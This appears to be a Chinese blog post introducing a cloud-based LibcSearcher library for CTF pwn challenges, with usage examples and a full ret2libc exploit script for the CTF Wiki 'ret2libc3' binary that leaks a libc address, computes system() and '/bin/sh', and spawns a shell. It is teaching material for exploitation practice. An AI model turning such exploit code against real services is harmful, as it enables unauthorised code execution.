2021年能用的LibcSearcher

最新推荐文章于 2024-04-03 09:42:23 发布
最新推荐文章于 2024-04-03 09:42:23 发布
阅读量4k 收藏 3
点赞数 3
分类专栏: pwn 文章标签: harmonyos 物联网 elasticsearch
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelxLZ/article/details/121571868
版权
  • Author:ZERO-A-ONE
  • Date:2021-11-27

这里介绍一个全新的 LibcSearcher 实现。基于 libc-database云端数据库而非本地数据库。原版 LibcSearcher 仓库由于年久失修,经测试发现其基本失效

项目地址如下:https://github.com/dev2ero/LibcSearcher

安装:

pip3 install LibcSearcher

使用方法:

from LibcSearcher import *
obj = LibcSearcher("fgets", 0x7ff39014bd90) # 使用一个已知符号地址作为初始约束,初始化 LibcSearcher
obj.add_condition("atoi", 218528) # 添加一个约束条件
obj.dump("printf") # 根据已有约束条件,查询某个符号在 Libc 中的地址

此外,比起以上原版接口,添加了如下些许姿势

len(obj) # 返回在当前约束条件下,可能的 Libc 数量

print(obj) # 若 Libc 已被唯一确定,打印其详细信息

for libc in obj :
    print(libc) # 实现了迭代器,打印(或其它操作)当前所有可能的 Libc 

obj.select_libc() # 打印可能的 Libc 列表,手动选择一个认为正确的 Libc
obj.select_libc(2) # 手动选择 2 号 Libc 作为正确的 Libc

具体举例使用的话以CTF Wiki里的Ret2Libc3为例,EXP改写为

#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
sh = process('./ret2libc3')

ret2libc3 = ELF('./ret2libc3')

puts_plt = ret2libc3.plt['puts']
libc_start_main_got = ret2libc3.got['__libc_start_main']
main = ret2libc3.symbols['main']

print ("leak libc_start_main_got addr and return to main again")
payload = flat([b'A' * 112, puts_plt, main, libc_start_main_got])
sh.sendlineafter('Can you find it !?', payload)

print ("get the related addr")
libc_start_main_addr = u32(sh.recv()[0:4])
libc = LibcSearcher("__libc_start_main", libc_start_main_addr)
#libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
print ("get shell")
payload = flat([b'A' * 104, system_addr, 0xdeadbeef, binsh_addr])
sh.sendline(payload)
sh.interactive()
ZERO-A-ONE
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
探索LibcSearcher:二进制安全分析利器
gitblog_00033的博客
04-02 456
探索LibcSearcher:二进制安全分析利器 项目地址:https://gitcode.com/dev2ero/LibcSearcher 在软件开发和安全领域,理解库函数的行为至关重要,尤其是C语言中的libc。LibcSearcher是一个创新的开源工具,专门设计用于快速搜索和分析各种libc版本的功能实现。这篇文章将带你深入了解该项目的背景、技术细节、应用场景以及其独特优势。 项目简介 L...
LibcSearcher的安装使用
qq_40026795的博客
06-26 1万+
LibcSearcher是针对pwn做的python库,在做pwn题时寻找libc版本非常好用,使用方式也非常简单: fromLibcSearcherimport* #第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型 obj=LibcSearcher("fgets",0X7ff39014bd90) 可以安装也可以直接将LibcSearcher.py拿到...
LibcSearcher安装的心路历程和坑____Python2,setuptools,libcsearcher其他版本
OrientalGlass的博客
01-04 2024
2.下载python2后,提示没有setuptools,这个setuptools应该指的是Python2版本的,因为之前使用其他命令时提示已经有了setuptools(推测这个是python3版本)在这篇文章得到解决方案。,我的ubuntu默认没有python2,只有python3,所以又下载了一个python2。只能试试手动安装了,就是在手动安装的过程中解决了2的setuptools问题。没有办法初始化,写脚本也无法成功导入模块,所以就下了另一个。然后就是下载数据库了,非常漫长,写完文章还没下好。
[二进制学习笔记]LibcSearcher安装
hide_in_darkness的博客
08-08 1718
​ 这是针对CTF比赛所做的小工具,在泄露了Libc中的某一个函数地址后,常常为不知道对方所使用的操作系统及libc的版本而苦恼,常规方法就是挨个把常见的Libc.so从系统里拿出来,与泄露的地址对比一下最后12位。​ 详细的安装过程其实github上就有,我在这里炒个冷饭(工具地址:https://github.com/lieanu/LibcSearcher)......
LibcSearcher的使用
Sakura给爷pwn全场
12-03 1356
BUUCTF ciscn_2019_c_1 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() sla=lambda x,y:io.sendlineafter(x,y) io=remote('xxx',xxx) elf=ELF('
解决LibcSearcher找不到合适libc(更新libc)
yongbaoii的博客
02-09 5260
1 尝试直接更新 进入LibcSearcher/libc-database中运行./get文件即可进行更新。 可能./get更新不了。 2 究极更新 cd LibcSearcher rm -rf libc-database git clone https://github.com/niklasb/libc-database.git 然后进入libc-database执行./get 可能会这样提醒。 那么就看需要点啥更新点啥,一般是 ./get ubuntu #一般pwn题环境就Ubuntu,所以有第一个
LibcSearcher
01-18
github上的LibSearcher经常下载失败,手动上传一个
LibcSearcher.zip
06-09
项目地址:https://github.com/lieanu/LibcSearcher,因为依赖于庞大的https://github.com/lieanu/libc-database,大概有490M左右
LibcSearcher-ng
04-16
由于年久失修,经测试发现其基本失效。选择新建一个项目而非基于原有 LibcSearcher 继续开发的原因如下:原仓库基于 libc-database ,拷贝其数据库中的部分常用 libc 文件,在本地进行求解。这一方案有两个问题:...
libc-database
04-16
记录了许多的libc库,用于LibcSearcher查询libc,近400mb大小,连不上github的同学们不用./get,可以直接下载来用
LibcSearcher添加kali自带libc
菜的只能随便写写博客
02-18 1715
LibcSearcher是一个pwn中比较好用的libc版本搜寻,并且带有libc-database,使用kali或者其他linux调试的时候,需要使用本机的libc文件,下面说一说怎么查找本机的libc和添加libc。 查看本机使用libc 以上分别是64位和32位的libc文件所在。 添加libc 找到LibcSearcher所在路径的libc-database文件夹下面,具体使用方法参...
准确识别ELF文件使用的libc.so版本,LibcSearcher 工具的使用
ifthengg的博客
10-20 930
准确到小数点100位,识别ELF文件使用的libc.so版本,LibcSearcher 工具的使用
安装LibcSearcher的方法
热门推荐
neuisf的博客
01-04 1万+
在练习Pwn过程中,要用到python的一个库,叫做LibcSearcher,安装方法如下: 1.git clone https://github.com/lieanu/LibcSearcher.git 2.cd LibcSearcher 3.python setup.py install 4.直接运行python exp.py会提示“No module named LibcSearche...
探索二进制世界的宝藏:LibcSearcher
最新发布
gitblog_00061的博客
04-03 272
探索二进制世界的宝藏:LibcSearcher 项目地址:https://gitcode.com/zarkivy/LibcSearcher 当你在处理软件漏洞、逆向工程或进行安全研究时,对库函数的理解是关键之一。LibcSearcher 是一个强大的开源工具,它旨在帮助开发者和安全研究人员快速查找与特定二进制文件相关联的 C 库函数信息。这款工具将帮助你节省大量时间,提高你的工作效率。 技术分析 ...
关于蒸米的一步一步学ROP之linux_x86的学习笔记
lingyuexueai的博客
08-12 1540
写在开头:level2没有源码,所以第二个“Ret2libc – Bypass DEP 通过ret2libc绕过DEP防护”做不动……另外socat还没学会用==,按照步骤输入命令后一直没反应,也不知道怎么办,所以后面的远程攻击也没法进行……于是只做了第一个Control Flow Hijack 程序流劫持 原文地址:http://jaq.alibaba.com/community/art/sh...
LibcSearcher报错:no matched libc,please add more libc or try others
qq_40889704的博客
05-09 3505
今天在CTF-wiki上学习缓冲区溢出攻击中的ret2libc 在编写攻击代码时,用到了一个名为LibcSearcher的库,来确定libc中某个函数的地址。 这里先给出库的链接:https://github.com/lieanu/LibcSearcher 但是按照wiki上给出的例子编写好攻击代码,在运行时报错了: no matched libc,please add more libc or try others 大概意思是找不到匹配的libc版本库。 进到LibcSearcher的libc-data
用于查询libc版本函数偏移的工具
、moddemod
06-09 2847
在线查询libc版本的网站: https://libc.blukat.me/ 一个python项目LibcSearcher 项目地址:https://github.com/lieanu/LibcSearcher 安装 (下载比较慢,该项目依赖另外一个项目https://github.com/lieanu/libc-database) git clone https://github.com/lieanu/LibcSearcher.git cd LibcSearcher python setup.py de
LibcSearcher找不到合适的libc(更新到python3版本Libc)
MDong1344的博客
09-13 2449
LibcSearcher找不到合适的libc(更新到python3版本Libc) 如果你是用的基于python2的LibcSearcher,可以安装python3版本的libcsearcher https://pypi.org/project/LibcSearcher/ pip3 install LibcSearcher 更新之后用python3执行exp就可以了! 不过这个库要联网使用~ … 最近在看pwn, 看到ret2libc,ret2csu的时候好几个题我的libcsearcher一次也

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值